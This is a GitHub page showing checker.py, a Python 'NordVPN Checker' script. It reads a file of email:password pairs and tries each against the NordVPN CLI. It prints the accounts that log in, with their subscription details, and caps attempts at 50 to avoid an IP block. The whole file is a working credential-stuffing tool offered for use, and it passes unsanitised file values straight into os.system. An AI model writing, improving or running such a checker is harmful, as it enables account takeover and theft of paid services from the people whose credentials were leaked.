-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathchecker.py
75 lines (67 loc) · 2.84 KB
/
checker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import os
import subprocess
import time
import sys
import getopt
print('')
print(' /$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$')
print('| $$$ | $$ | $$| $$ | $$| $$__ $$| $$$ | $$')
print('| $$$$| $$ /$$$$$$ /$$$$$$ /$$$$$$$| $$ | $$| $$ \ $$| $$$$| $$')
print('| $$ $$ $$ /$$__ $$ /$$__ $$ /$$__ $$| $$ / $$/| $$$$$$$/| $$ $$ $$')
print('| $$ $$$$| $$ \ $$| $$ \__/| $$ | $$ \ $$ $$/ | $$____/ | $$ $$$$')
print('| $$\ $$$| $$ | $$| $$ | $$ | $$ \ $$$/ | $$ | $$\ $$$')
print('| $$ \ $$| $$$$$$/| $$ | $$$$$$$ \ $/ | $$ | $$ \ $$')
print('|__/ \__/ \______/ |__/ \_______/ \_/ |__/ |__/ \__/')
print('')
print(' /$$$$$$ /$$ /$$ ')
print(' /$$__ $$| $$ | $$ ')
print('| $$ \__/| $$$$$$$ /$$$$$$ /$$$$$$$| $$ /$$ /$$$$$$ /$$$$$$ ')
print('| $$ | $$__ $$ /$$__ $$ /$$_____/| $$ /$$/ /$$__ $$ /$$__ $$')
print('| $$ | $$ \ $$| $$$$$$$$| $$ | $$$$$$/ | $$$$$$$$| $$ \__/')
print('| $$ $$| $$ | $$| $$_____/| $$ | $$_ $$ | $$_____/| $$ ')
print('| $$$$$$/| $$ | $$| $$$$$$$| $$$$$$$| $$ \ $$| $$$$$$$| $$ ')
print(' \______/ |__/ |__/ \_______/ \_______/|__/ \__/ \_______/|__/ ')
print('')
G = '\033[92m'
W = '\033[93m'
R = '\033[91m'
E = '\033[0m'
try:
options , args = getopt.getopt(sys.argv[1:], 'f:', 'file=')
except getopt.GetoptError:
print(R + 'Argument Error' + E)
sys.exit()
if not options:
print(R + 'Pass the file !' + E)
sys.exit()
first_arg = options[0][0]
first_arg_val = options[0][1]
handle = None
if first_arg in ('-f','--file'):
if os.path.isfile(first_arg_val):
handle = open(first_arg_val)
count = 0
if handle:
try:
first_logout = subprocess.check_output(['nordvpn','logout'])
except:
pass
for line in handle:
count += 1
user , pas = line.strip().split(':') # Email and Password is separated by colon ':'
res = os.system('nordvpn login -u {} -p {}'.format(user,pas))
info = None
if res == 0: # 0 represents "No Error"
info = str(subprocess.check_output(['nordvpn','account'],encoding='437'))
info = info.split('Account Information:')[1]
info = info.split('Email Address: ')[1]
email , info = info.split('VPN Service: ')
print(str(count)+'-' ,user+':'+pas+'\t'+info)
os.system('nordvpn logout')
print()
else:
print(str(count)+'- '+user+':'+pas+'\t'+str(info)+'\n')
if count == 50: # Count can be changed but note that after 50 counts your IP might get blocked.
handle.close()
print(f"We have reached to {count} logins")
exit()